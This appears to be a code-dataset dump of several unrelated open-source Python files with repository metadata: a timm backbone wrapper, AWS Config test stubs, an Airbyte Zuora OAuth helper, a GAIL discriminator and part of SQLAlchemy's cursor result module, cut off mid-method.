features_only=config.features_only,
in_chans=config.num_channels,
out_indices=out_indices,
**kwargs,
)
# These are used to control the output of the model when called. If output_hidden_states is True, then
# return_layers is modified to include all layers.
self._return_layers = self._backbone.return_layers
self._all_layers = {layer["module"]: str(i) for i, layer in enumerate(self._backbone.feature_info.info)}
super()._init_backbone(config)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
requires_backends(cls, ["vision", "timm"])
from ...models.timm_backbone import TimmBackboneConfig
config = kwargs.pop("config", TimmBackboneConfig())
use_timm = kwargs.pop("use_timm_backbone", True)
if not use_timm:
raise ValueError("use_timm_backbone must be True for timm backbones")
num_channels = kwargs.pop("num_channels", config.num_channels)
features_only = kwargs.pop("features_only", config.features_only)
use_pretrained_backbone = kwargs.pop("use_pretrained_backbone", config.use_pretrained_backbone)
out_indices = kwargs.pop("out_indices", config.out_indices)
config = TimmBackboneConfig(
backbone=pretrained_model_name_or_path,
num_channels=num_channels,
features_only=features_only,
use_pretrained_backbone=use_pretrained_backbone,
out_indices=out_indices,
)
return super()._from_config(config, **kwargs)
def _init_weights(self, module):
"""
Empty init weights function to ensure compatibility of the class in the library.
"""
pass
def forward(
self,
pixel_values: torch.FloatTensor,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs,
) -> Union[BackboneOutput, Tuple[Tensor, ...]]:
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
if output_attentions:
raise ValueError("Cannot output attentions for timm backbones at the moment")
if output_hidden_states:
# We modify the return layers to include all the stages of the backbone
self._backbone.return_layers = self._all_layers
hidden_states = self._backbone(pixel_values, **kwargs)
self._backbone.return_layers = self._return_layers
feature_maps = tuple(hidden_states[i] for i in self.out_indices)
else:
feature_maps = self._backbone(pixel_values, **kwargs)
hidden_states = None
feature_maps = tuple(feature_maps)
hidden_states = tuple(hidden_states) if hidden_states is not None else None
if not return_dict:
output = (feature_maps,)
if output_hidden_states:
output = output + (hidden_states,)
return output
return BackboneOutput(feature_maps=feature_maps, hidden_states=hidden_states, attentions=None)
|
eb9b04f5170762132bcdfcb7d03113f23cbdd806
|
d51f530078404a24f1844b53b037bbfed238a784
|
/python/test_tools/config_stubber.py
|
80e9b4c0a2617dad7d42f576a573dc3a9a0d4e34
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
awsdocs/aws-doc-sdk-examples
|
fff85d1b4119fe3331174396a5723c7f054203eb
|
dec41fb589043ac9d8667aac36fb88a53c3abe50
|
refs/heads/main
| 2023-09-03T19:50:57.809260
| 2023-09-01T16:23:01
| 2023-09-01T16:23:01
| 66,023,605
| 8,240
| 6,037
|
Apache-2.0
| 2023-09-14T16:52:02
| 2016-08-18T19:06:57
|
Java
|
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
config_stubber.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Stub functions that are used by the AWS Config unit tests.
"""
from test_tools.example_stubber import ExampleStubber
class ConfigStubber(ExampleStubber):
"""
A class that implements stub functions used by AWS Config unit tests.
The stubbed functions expect certain parameters to be passed to them as
part of the tests, and raise errors if the parameters are not as expected.
"""
def __init__(self, client, use_stubs=True):
"""
Initializes the object with a specific client and configures it for
stubbing or AWS passthrough.
:param client: A Boto3 AWS Config client.
:param use_stubs: When True, use stubs to intercept requests. Otherwise,
pass requests through to AWS.
"""
super().__init__(client, use_stubs)
def stub_put_config_rule(self, rule, error_code=None):
expected_params = {'ConfigRule': rule}
response = {}
self._stub_bifurcator(
'put_config_rule', expected_params, response, error_code=error_code)
def stub_describe_config_rules(self, rule_names, source_ids=None, error_code=None):
expected_params = {'ConfigRuleNames': rule_names}
response = {'ConfigRules': [{
'ConfigRuleName': name,
'Source': {'Owner': 'Test', 'SourceIdentifier': 'TestID'}}
for name in rule_names]}
if source_ids is not None:
for rule, source_id in zip(response['ConfigRules'], source_ids):
rule['Source']['SourceIdentifier'] = source_id
self._stub_bifurcator(
'describe_config_rules', expected_params, response, error_code=error_code)
def stub_delete_config_rule(self, rule_name, error_code=None):
expected_params = {'ConfigRuleName': rule_name}
response = {}
self._stub_bifurcator(
'delete_config_rule', expected_params, response, error_code=error_code)
def stub_describe_conformance_packs(self, packs, error_code=None):
expected_params = {}
response = {'ConformancePackDetails': [{
'ConformancePackName': pack,
'ConformancePackArn': f'arn:{pack}',
'ConformancePackId': f'{pack}-id'
} for pack in packs]}
self._stub_bifurcator(
'describe_conformance_packs', expected_params, response, error_code=error_code)
def stub_describe_conformance_pack_compliance(self, pack_name, rule_names, error_code=None):
expected_params = {'ConformancePackName': pack_name}
response = {
'ConformancePackName': pack_name,
'ConformancePackRuleComplianceList': [{
'ConfigRuleName': rule_name
} for rule_name in rule_names]}
self._stub_bifurcator(
'describe_conformance_pack_compliance', expected_params, response, error_code=error_code)
|
ef9a349d85c309788fa5f516989f6337b1acab23
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-integrations/connectors/source-zuora/source_zuora/zuora_auth.py
|
c5adcd9666c2b3b4a0c145014d3af9e78d83dbd0
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"Elastic-2.0"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 1,131
|
py
|
zuora_auth.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import Any, Dict, Mapping
from airbyte_cdk.sources.streams.http.requests_native_auth.oauth import Oauth2Authenticator
from .zuora_endpoint import get_url_base
class OAuth(Oauth2Authenticator):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def get_refresh_request_body(self) -> Mapping[str, Any]:
payload = super().get_refresh_request_body()
payload["grant_type"] = "client_credentials"
payload.pop("refresh_token") # Zuora doesn't have Refresh Token parameter
return payload
class ZuoraAuthenticator:
def __init__(self, config: Dict):
self.config = config
@property
def url_base(self) -> str:
return get_url_base(self.config["tenant_endpoint"])
def get_auth(self) -> OAuth:
return OAuth(
token_refresh_endpoint=f"{self.url_base}/oauth/token",
client_id=self.config["client_id"],
client_secret=self.config["client_secret"],
refresh_token=None, # Zuora doesn't have Refresh Token parameter
)
|
d869925851c1fb7d9f973e43eeca3fda04d913c3
|
1382132f3687305173f3bb61391cf2002e6d7ce6
|
/rl_algorithms/gail/networks.py
|
c8f66bf70c7ea49fb663526c4816fd8dda7dc056
|
[
"MIT"
] |
permissive
|
medipixel/rl_algorithms
|
37caff91f78c51e70f06d0c2ad590fabe2a7ebd6
|
fdfac4e7056ee5a9d5b48b7b9653ce844a03ca22
|
refs/heads/master
| 2023-08-06T09:11:48.128961
| 2022-09-15T06:21:54
| 2022-09-15T06:21:54
| 161,100,560
| 525
| 94
|
MIT
| 2023-04-08T09:15:39
| 2018-12-10T01:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,611
|
py
|
networks.py
|
# -*- coding: utf-8 -*-
from typing import Tuple, Union
import torch
import torch.nn as nn
from rl_algorithms.common.helper_functions import identity
from rl_algorithms.registry import build_backbone, build_head
from rl_algorithms.utils.config import ConfigDict
# TODO: Remove this when upgrading to torch>=1.7
# pylint: disable=abstract-method
class Discriminator(nn.Module):
"""Discriminator to classify experience data and expert data"""
def __init__(
self,
backbone_cfg: ConfigDict,
head_cfg: ConfigDict,
action_embedder_cfg: ConfigDict,
shared_backbone: nn.Module = None,
):
nn.Module.__init__(self)
if shared_backbone is not None:
self.backbone = shared_backbone
head_cfg.configs.input_size = self.calculate_fc_input_size(
head_cfg.configs.state_size
)
elif not backbone_cfg:
self.backbone = identity
head_cfg.configs.input_size = head_cfg.configs.state_size[0]
else:
self.backbone = build_backbone(backbone_cfg)
head_cfg.configs.input_size = self.calculate_fc_input_size(
head_cfg.configs.state_size
)
self.action_embedder = None
if action_embedder_cfg:
action_embedder_cfg.configs.input_size = head_cfg.configs.action_size
self.action_embedder = build_head(action_embedder_cfg)
head_cfg.configs.input_size += action_embedder_cfg.configs.output_size
else:
head_cfg.configs.input_size += head_cfg.configs.action_size
self.head = build_head(head_cfg)
def forward(
self, state_action: Tuple[torch.Tensor, torch.Tensor]
) -> Union[torch.Tensor, Tuple[torch.Tensor, ...]]:
"""Forward method implementation. Use in get_action method in agent."""
state_feature = self.backbone(state_action[0])
action_feature = state_action[1]
if self.action_embedder:
action_feature = self.forward_action_embedder(action_feature)
return self.head(torch.cat([state_feature, action_feature], dim=-1))
def forward_action_embedder(
self, x: torch.Tensor
) -> Union[torch.Tensor, Tuple[torch.Tensor, ...]]:
"""Forward method of action embedder."""
return self.action_embedder(x)
def calculate_fc_input_size(self, state_dim: tuple):
"""Calculate fc input size according to the shape of cnn."""
x = torch.zeros(state_dim).unsqueeze(0)
output = self.backbone(x).detach().view(-1)
return output.shape[0]
|
75516c87834b409fbc43f7bdfef1475700bcad6d
|
0ca218c0f54dac33a2ade4accfdf8f5be3207588
|
/lib/sqlalchemy/engine/cursor.py
|
246cf6fe78009537ed35048aa0ae346525abdb93
|
[
"MIT"
] |
permissive
|
sqlalchemy/sqlalchemy
|
9d949c67c9b5396b1f33e7ff0f3230c81babf5be
|
b382bff6e3464f039db0fd1f2ce1b79038675e48
|
refs/heads/main
| 2023-08-31T17:40:59.565421
| 2023-08-30T15:01:41
| 2023-08-30T15:01:41
| 159,271,175
| 8,083
| 1,489
|
MIT
| 2023-09-12T18:53:55
| 2018-11-27T03:35:03
|
Python
|
UTF-8
|
Python
| false
| false
| 74,396
|
py
|
cursor.py
|
# engine/cursor.py
# Copyright (C) 2005-2023 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
# mypy: allow-untyped-defs, allow-untyped-calls
"""Define cursor-specific result set constructs including
:class:`.CursorResult`."""
from __future__ import annotations
import collections
import functools
import operator
import typing
from typing import Any
from typing import cast
from typing import ClassVar
from typing import Dict
from typing import Iterator
from typing import List
from typing import Mapping
from typing import NoReturn
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import TYPE_CHECKING
from typing import TypeVar
from typing import Union
from .result import IteratorResult
from .result import MergedResult
from .result import Result
from .result import ResultMetaData
from .result import SimpleResultMetaData
from .result import tuplegetter
from .row import Row
from .. import exc
from .. import util
from ..sql import elements
from ..sql import sqltypes
from ..sql import util as sql_util
from ..sql.base import _generative
from ..sql.compiler import ResultColumnsEntry
from ..sql.compiler import RM_NAME
from ..sql.compiler import RM_OBJECTS
from ..sql.compiler import RM_RENDERED_NAME
from ..sql.compiler import RM_TYPE
from ..sql.type_api import TypeEngine
from ..util import compat
from ..util.typing import Literal
from ..util.typing import Self
if typing.TYPE_CHECKING:
from .base import Connection
from .default import DefaultExecutionContext
from .interfaces import _DBAPICursorDescription
from .interfaces import DBAPICursor
from .interfaces import Dialect
from .interfaces import ExecutionContext
from .result import _KeyIndexType
from .result import _KeyMapRecType
from .result import _KeyMapType
from .result import _KeyType
from .result import _ProcessorsType
from .result import _TupleGetterType
from ..sql.type_api import _ResultProcessorType
_T = TypeVar("_T", bound=Any)
# metadata entry tuple indexes.
# using raw tuple is faster than namedtuple.
# these match up to the positions in
# _CursorKeyMapRecType
MD_INDEX: Literal[0] = 0
"""integer index in cursor.description
"""
MD_RESULT_MAP_INDEX: Literal[1] = 1
"""integer index in compiled._result_columns"""
MD_OBJECTS: Literal[2] = 2
"""other string keys and ColumnElement obj that can match.
This comes from compiler.RM_OBJECTS / compiler.ResultColumnsEntry.objects
"""
MD_LOOKUP_KEY: Literal[3] = 3
"""string key we usually expect for key-based lookup
this comes from compiler.RM_NAME / compiler.ResultColumnsEntry.name
"""
MD_RENDERED_NAME: Literal[4] = 4
"""name that is usually in cursor.description
this comes from compiler.RENDERED_NAME / compiler.ResultColumnsEntry.keyname
"""
MD_PROCESSOR: Literal[5] = 5
"""callable to process a result value into a row"""
MD_UNTRANSLATED: Literal[6] = 6
"""raw name from cursor.description"""
_CursorKeyMapRecType = Tuple[
Optional[int], # MD_INDEX, None means the record is ambiguously named
int, # MD_RESULT_MAP_INDEX
List[Any], # MD_OBJECTS
str, # MD_LOOKUP_KEY
str, # MD_RENDERED_NAME
Optional["_ResultProcessorType"], # MD_PROCESSOR
Optional[str], # MD_UNTRANSLATED
]
_CursorKeyMapType = Mapping["_KeyType", _CursorKeyMapRecType]
# same as _CursorKeyMapRecType except the MD_INDEX value is definitely
# not None
_NonAmbigCursorKeyMapRecType = Tuple[
int,
int,
List[Any],
str,
str,
Optional["_ResultProcessorType"],
str,
]
class CursorResultMetaData(ResultMetaData):
"""Result metadata for DBAPI cursors."""
__slots__ = (
"_keymap",
"_processors",
"_keys",
"_keymap_by_result_column_idx",
"_tuplefilter",
"_translated_indexes",
"_safe_for_cache",
"_unpickled",
"_key_to_index"
# don't need _unique_filters support here for now. Can be added
# if a need arises.
)
_keymap: _CursorKeyMapType
_processors: _ProcessorsType
_keymap_by_result_column_idx: Optional[Dict[int, _KeyMapRecType]]
_unpickled: bool
_safe_for_cache: bool
_translated_indexes: Optional[List[int]]
returns_rows: ClassVar[bool] = True
def _has_key(self, key: Any) -> bool:
return key in self._keymap
def _for_freeze(self) -> ResultMetaData:
return SimpleResultMetaData(
self._keys,
extra=[self._keymap[key][MD_OBJECTS] for key in self._keys],
)
def _make_new_metadata(
self,
*,
unpickled: bool,
processors: _ProcessorsType,
keys: Sequence[str],
keymap: _KeyMapType,
tuplefilter: Optional[_TupleGetterType],
translated_indexes: Optional[List[int]],
safe_for_cache: bool,
keymap_by_result_column_idx: Any,
) -> CursorResultMetaData:
new_obj = self.__class__.__new__(self.__class__)
new_obj._unpickled = unpickled
new_obj._processors = processors
new_obj._keys = keys
new_obj._keymap = keymap
new_obj._tuplefilter = tuplefilter
new_obj._translated_indexes = translated_indexes
new_obj._safe_for_cache = safe_for_cache
new_obj._keymap_by_result_column_idx = keymap_by_result_column_idx
new_obj._key_to_index = self._make_key_to_index(keymap, MD_INDEX)
return new_obj
def _remove_processors(self) -> CursorResultMetaData:
assert not self._tuplefilter
return self._make_new_metadata(
unpickled=self._unpickled,
processors=[None] * len(self._processors),
tuplefilter=None,
translated_indexes=None,
keymap={
key: value[0:5] + (None,) + value[6:]
for key, value in self._keymap.items()
},
keys=self._keys,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def _splice_horizontally(
self, other: CursorResultMetaData
) -> CursorResultMetaData:
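        """Combine this metadata with ``other`` side by side: ``other``'s
        keymap entries are appended with their positional and result-map
        indexes offset by this metadata's column count. (Summary inferred
        from the implementation below.)
        """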
assert not self._tuplefilter
keymap = dict(self._keymap)
offset = len(self._keys)
keymap.update(
{
key: (
# int index should be None for ambiguous key
value[0] + offset
if value[0] is not None and key not in keymap
else None,
value[1] + offset,
*value[2:],
)
for key, value in other._keymap.items()
}
)
return self._make_new_metadata(
unpickled=self._unpickled,
processors=self._processors + other._processors, # type: ignore
tuplefilter=None,
translated_indexes=None,
keys=self._keys + other._keys, # type: ignore
keymap=keymap,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx={
metadata_entry[MD_RESULT_MAP_INDEX]: metadata_entry
for metadata_entry in keymap.values()
},
)
def _reduce(self, keys: Sequence[_KeyIndexType]) -> ResultMetaData:
recs = list(self._metadata_for_keys(keys))
indexes = [rec[MD_INDEX] for rec in recs]
new_keys: List[str] = [rec[MD_LOOKUP_KEY] for rec in recs]
if self._translated_indexes:
indexes = [self._translated_indexes[idx] for idx in indexes]
tup = tuplegetter(*indexes)
new_recs = [(index,) + rec[1:] for index, rec in enumerate(recs)]
keymap = {rec[MD_LOOKUP_KEY]: rec for rec in new_recs}
# TODO: need unit test for:
# result = connection.execute("raw sql, no columns").scalars()
# without the "or ()" it's failing because MD_OBJECTS is None
keymap.update(
(e, new_rec)
for new_rec in new_recs
for e in new_rec[MD_OBJECTS] or ()
)
return self._make_new_metadata(
unpickled=self._unpickled,
processors=self._processors,
keys=new_keys,
tuplefilter=tup,
translated_indexes=indexes,
keymap=keymap, # type: ignore[arg-type]
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def _adapt_to_context(self, context: ExecutionContext) -> ResultMetaData:
"""When using a cached Compiled construct that has a _result_map,
for a new statement that used the cached Compiled, we need to ensure
the keymap has the Column objects from our new statement as keys.
So here we rewrite keymap with new entries for the new columns
as matched to those of the cached statement.
"""
if not context.compiled or not context.compiled._result_columns:
return self
compiled_statement = context.compiled.statement
invoked_statement = context.invoked_statement
if TYPE_CHECKING:
assert isinstance(invoked_statement, elements.ClauseElement)
if compiled_statement is invoked_statement:
return self
assert invoked_statement is not None
# this is the most common path for Core statements when
# caching is used. In ORM use, this codepath is not really used
# as the _result_disable_adapt_to_context execution option is
# set by the ORM.
# make a copy and add the columns from the invoked statement
# to the result map.
keymap_by_position = self._keymap_by_result_column_idx
if keymap_by_position is None:
            # first retrieval from cache; this map will not be set up yet,
# initialize lazily
keymap_by_position = self._keymap_by_result_column_idx = {
metadata_entry[MD_RESULT_MAP_INDEX]: metadata_entry
for metadata_entry in self._keymap.values()
}
assert not self._tuplefilter
return self._make_new_metadata(
keymap=compat.dict_union(
self._keymap,
{
new: keymap_by_position[idx]
for idx, new in enumerate(
invoked_statement._all_selected_columns
)
if idx in keymap_by_position
},
),
unpickled=self._unpickled,
processors=self._processors,
tuplefilter=None,
translated_indexes=None,
keys=self._keys,
safe_for_cache=self._safe_for_cache,
keymap_by_result_column_idx=self._keymap_by_result_column_idx,
)
def __init__(
self,
parent: CursorResult[Any],
cursor_description: _DBAPICursorDescription,
):
context = parent.context
self._tuplefilter = None
self._translated_indexes = None
self._safe_for_cache = self._unpickled = False
if context.result_column_struct:
(
result_columns,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
) = context.result_column_struct
num_ctx_cols = len(result_columns)
else:
result_columns = ( # type: ignore
cols_are_ordered
) = (
num_ctx_cols
) = (
ad_hoc_textual
) = loose_column_name_matching = textual_ordered = False
# merge cursor.description with the column info
# present in the compiled structure, if any
raw = self._merge_cursor_description(
context,
cursor_description,
result_columns,
num_ctx_cols,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
)
# processors in key order which are used when building up
# a row
self._processors = [
metadata_entry[MD_PROCESSOR] for metadata_entry in raw
]
# this is used when using this ResultMetaData in a Core-only cache
# retrieval context. it's initialized on first cache retrieval
# when the _result_disable_adapt_to_context execution option
# (which the ORM generally sets) is not set.
self._keymap_by_result_column_idx = None
# for compiled SQL constructs, copy additional lookup keys into
# the key lookup map, such as Column objects, labels,
# column keys and other names
if num_ctx_cols:
# keymap by primary string...
by_key = {
metadata_entry[MD_LOOKUP_KEY]: metadata_entry
for metadata_entry in raw
}
if len(by_key) != num_ctx_cols:
# if by-primary-string dictionary smaller than
# number of columns, assume we have dupes; (this check
# is also in place if string dictionary is bigger, as
# can occur when '*' was used as one of the compiled columns,
# which may or may not be suggestive of dupes), rewrite
# dupe records with "None" for index which results in
# ambiguous column exception when accessed.
#
# this is considered to be the less common case as it is not
# common to have dupe column keys in a SELECT statement.
#
# new in 1.4: get the complete set of all possible keys,
# strings, objects, whatever, that are dupes across two
# different records, first.
index_by_key: Dict[Any, Any] = {}
dupes = set()
for metadata_entry in raw:
for key in (metadata_entry[MD_RENDERED_NAME],) + (
metadata_entry[MD_OBJECTS] or ()
):
idx = metadata_entry[MD_INDEX]
# if this key has been associated with more than one
# positional index, it's a dupe
if index_by_key.setdefault(key, idx) != idx:
dupes.add(key)
# then put everything we have into the keymap excluding only
# those keys that are dupes.
self._keymap = {
obj_elem: metadata_entry
for metadata_entry in raw
if metadata_entry[MD_OBJECTS]
for obj_elem in metadata_entry[MD_OBJECTS]
if obj_elem not in dupes
}
# then for the dupe keys, put the "ambiguous column"
# record into by_key.
by_key.update(
{
key: (None, None, [], key, key, None, None)
for key in dupes
}
)
else:
# no dupes - copy secondary elements from compiled
# columns into self._keymap. this is the most common
# codepath for Core / ORM statement executions before the
# result metadata is cached
self._keymap = {
obj_elem: metadata_entry
for metadata_entry in raw
if metadata_entry[MD_OBJECTS]
for obj_elem in metadata_entry[MD_OBJECTS]
}
# update keymap with primary string names taking
# precedence
self._keymap.update(by_key)
else:
# no compiled objects to map, just create keymap by primary string
self._keymap = {
metadata_entry[MD_LOOKUP_KEY]: metadata_entry
for metadata_entry in raw
}
# update keymap with "translated" names. In SQLAlchemy this is a
# sqlite only thing, and in fact impacting only extremely old SQLite
# versions unlikely to be present in modern Python versions.
# however, the pyhive third party dialect is
# also using this hook, which means others still might use it as well.
# I dislike having this awkward hook here but as long as we need
# to use names in cursor.description in some cases we need to have
# some hook to accomplish this.
if not num_ctx_cols and context._translate_colname:
self._keymap.update(
{
metadata_entry[MD_UNTRANSLATED]: self._keymap[
metadata_entry[MD_LOOKUP_KEY]
]
for metadata_entry in raw
if metadata_entry[MD_UNTRANSLATED]
}
)
self._key_to_index = self._make_key_to_index(self._keymap, MD_INDEX)
def _merge_cursor_description(
self,
context,
cursor_description,
result_columns,
num_ctx_cols,
cols_are_ordered,
textual_ordered,
ad_hoc_textual,
loose_column_name_matching,
):
"""Merge a cursor.description with compiled result column information.
There are at least four separate strategies used here, selected
depending on the type of SQL construct used to start with.
The most common case is that of the compiled SQL expression construct,
which generated the column names present in the raw SQL string and
which has the identical number of columns as were reported by
cursor.description. In this case, we assume a 1-1 positional mapping
between the entries in cursor.description and the compiled object.
This is also the most performant case as we disregard extracting /
decoding the column names present in cursor.description since we
already have the desired name we generated in the compiled SQL
construct.
The next common case is that of the completely raw string SQL,
such as passed to connection.execute(). In this case we have no
compiled construct to work with, so we extract and decode the
names from cursor.description and index those as the primary
result row target keys.
The remaining fairly common case is that of the textual SQL
that includes at least partial column information; this is when
we use a :class:`_expression.TextualSelect` construct.
This construct may have
unordered or ordered column information. In the ordered case, we
merge the cursor.description and the compiled construct's information
positionally, and warn if there are additional description names
present, however we still decode the names in cursor.description
as we don't have a guarantee that the names in the columns match
on these. In the unordered case, we match names in cursor.description
to that of the compiled construct based on name matching.
In both of these cases, the cursor.description names and the column
expression objects and names are indexed as result row target keys.
The final case is much less common, where we have a compiled
non-textual SQL expression construct, but the number of columns
in cursor.description doesn't match what's in the compiled
construct. We make the guess here that there might be textual
column expressions in the compiled construct that themselves include
a comma in them causing them to split. We do the same name-matching
as with textual non-ordered columns.
The name-matched system of merging is the same as that used by
SQLAlchemy for all cases up through the 0.9 series. Positional
matching for compiled SQL expressions was introduced in 1.0 as a
major performance feature, and positional matching for textual
:class:`_expression.TextualSelect` objects in 1.1.
As name matching is no longer
a common case, it was acceptable to factor it into smaller generator-
oriented methods that are easier to understand, but incur slightly
more performance overhead.
"""
if (
num_ctx_cols
and cols_are_ordered
and not textual_ordered
and num_ctx_cols == len(cursor_description)
):
self._keys = [elem[0] for elem in result_columns]
# pure positional 1-1 case; doesn't need to read
# the names from cursor.description
# most common case for Core and ORM
# this metadata is safe to cache because we are guaranteed
# to have the columns in the same order for new executions
self._safe_for_cache = True
return [
(
idx,
idx,
rmap_entry[RM_OBJECTS],
rmap_entry[RM_NAME],
rmap_entry[RM_RENDERED_NAME],
context.get_result_processor(
rmap_entry[RM_TYPE],
rmap_entry[RM_RENDERED_NAME],
cursor_description[idx][1],
),
None,
)
for idx, rmap_entry in enumerate(result_columns)
]
else:
# name-based or text-positional cases, where we need
# to read cursor.description names
if textual_ordered or (
ad_hoc_textual and len(cursor_description) == num_ctx_cols
):
self._safe_for_cache = True
# textual positional case
raw_iterator = self._merge_textual_cols_by_position(
context, cursor_description, result_columns
)
elif num_ctx_cols:
# compiled SQL with a mismatch of description cols
# vs. compiled cols, or textual w/ unordered columns
# the order of columns can change if the query is
# against a "select *", so not safe to cache
self._safe_for_cache = False
raw_iterator = self._merge_cols_by_name(
context,
cursor_description,
result_columns,
loose_column_name_matching,
)
else:
# no compiled SQL, just a raw string, order of columns
# can change for "select *"
self._safe_for_cache = False
raw_iterator = self._merge_cols_by_none(
context, cursor_description
)
return [
(
idx,
ridx,
obj,
cursor_colname,
cursor_colname,
context.get_result_processor(
mapped_type, cursor_colname, coltype
),
untranslated,
)
for (
idx,
ridx,
cursor_colname,
mapped_type,
coltype,
obj,
untranslated,
) in raw_iterator
]
def _colnames_from_description(self, context, cursor_description):
"""Extract column names and data types from a cursor.description.
Applies unicode decoding, column translation, "normalization",
and case sensitivity rules to the names based on the dialect.
"""
dialect = context.dialect
translate_colname = context._translate_colname
normalize_name = (
dialect.normalize_name if dialect.requires_name_normalize else None
)
untranslated = None
self._keys = []
for idx, rec in enumerate(cursor_description):
colname = rec[0]
coltype = rec[1]
if translate_colname:
colname, untranslated = translate_colname(colname)
if normalize_name:
colname = normalize_name(colname)
self._keys.append(colname)
yield idx, colname, untranslated, coltype
def _merge_textual_cols_by_position(
self, context, cursor_description, result_columns
):
num_ctx_cols = len(result_columns)
if num_ctx_cols > len(cursor_description):
util.warn(
"Number of columns in textual SQL (%d) is "
"smaller than number of columns requested (%d)"
% (num_ctx_cols, len(cursor_description))
)
seen = set()
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
if idx < num_ctx_cols:
ctx_rec = result_columns[idx]
obj = ctx_rec[RM_OBJECTS]
ridx = idx
mapped_type = ctx_rec[RM_TYPE]
if obj[0] in seen:
raise exc.InvalidRequestError(
"Duplicate column expression requested "
"in textual SQL: %r" % obj[0]
)
seen.add(obj[0])
else:
mapped_type = sqltypes.NULLTYPE
obj = None
ridx = None
yield idx, ridx, colname, mapped_type, coltype, obj, untranslated
def _merge_cols_by_name(
self,
context,
cursor_description,
result_columns,
loose_column_name_matching,
):
match_map = self._create_description_match_map(
result_columns, loose_column_name_matching
)
mapped_type: TypeEngine[Any]
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
try:
ctx_rec = match_map[colname]
except KeyError:
mapped_type = sqltypes.NULLTYPE
obj = None
result_columns_idx = None
else:
obj = ctx_rec[1]
mapped_type = ctx_rec[2]
result_columns_idx = ctx_rec[3]
yield (
idx,
result_columns_idx,
colname,
mapped_type,
coltype,
obj,
untranslated,
)
@classmethod
def _create_description_match_map(
cls,
result_columns: List[ResultColumnsEntry],
loose_column_name_matching: bool = False,
) -> Dict[
Union[str, object], Tuple[str, Tuple[Any, ...], TypeEngine[Any], int]
]:
"""when matching cursor.description to a set of names that are present
in a Compiled object, as is the case with TextualSelect, get all the
names we expect might match those in cursor.description.
"""
d: Dict[
Union[str, object],
Tuple[str, Tuple[Any, ...], TypeEngine[Any], int],
] = {}
for ridx, elem in enumerate(result_columns):
key = elem[RM_RENDERED_NAME]
if key in d:
# conflicting keyname - just add the column-linked objects
# to the existing record. if there is a duplicate column
# name in the cursor description, this will allow all of those
# objects to raise an ambiguous column error
e_name, e_obj, e_type, e_ridx = d[key]
d[key] = e_name, e_obj + elem[RM_OBJECTS], e_type, ridx
else:
d[key] = (elem[RM_NAME], elem[RM_OBJECTS], elem[RM_TYPE], ridx)
if loose_column_name_matching:
# when using a textual statement with an unordered set
# of columns that line up, we are expecting the user
# to be using label names in the SQL that match to the column
# expressions. Enable more liberal matching for this case;
# duplicate keys that are ambiguous will be fixed later.
for r_key in elem[RM_OBJECTS]:
d.setdefault(
r_key,
(elem[RM_NAME], elem[RM_OBJECTS], elem[RM_TYPE], ridx),
)
return d
def _merge_cols_by_none(self, context, cursor_description):
for (
idx,
colname,
untranslated,
coltype,
) in self._colnames_from_description(context, cursor_description):
yield (
idx,
None,
colname,
sqltypes.NULLTYPE,
coltype,
None,
untranslated,
)
if not TYPE_CHECKING:
def _key_fallback(
self, key: Any, err: Optional[Exception], raiseerr: bool = True
) -> Optional[NoReturn]:
if raiseerr:
if self._unpickled and isinstance(key, elements.ColumnElement):
raise exc.NoSuchColumnError(
"Row was unpickled; lookup by ColumnElement "
"is unsupported"
) from err
else:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'"
% util.string_or_unprintable(key)
) from err
else:
return None
def _raise_for_ambiguous_column_name(self, rec):
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in "
"result set column descriptions" % rec[MD_LOOKUP_KEY]
)
def _index_for_key(self, key: Any, raiseerr: bool = True) -> Optional[int]:
# TODO: can consider pre-loading ints and negative ints
# into _keymap - also no coverage here
if isinstance(key, int):
key = self._keys[key]
try:
rec = self._keymap[key]
except KeyError as ke:
x = self._key_fallback(key, ke, raiseerr)
assert x is None
return None
index = rec[0]
if index is None:
self._raise_for_ambiguous_column_name(rec)
return index
def _indexes_for_keys(self, keys):
try:
return [self._keymap[key][0] for key in keys]
except KeyError as ke:
# ensure it raises
CursorResultMetaData._key_fallback(self, ke.args[0], ke)
def _metadata_for_keys(
self, keys: Sequence[Any]
) -> Iterator[_NonAmbigCursorKeyMapRecType]:
for key in keys:
if int in key.__class__.__mro__:
key = self._keys[key]
try:
rec = self._keymap[key]
except KeyError as ke:
# ensure it raises
CursorResultMetaData._key_fallback(self, ke.args[0], ke)
index = rec[MD_INDEX]
if index is None:
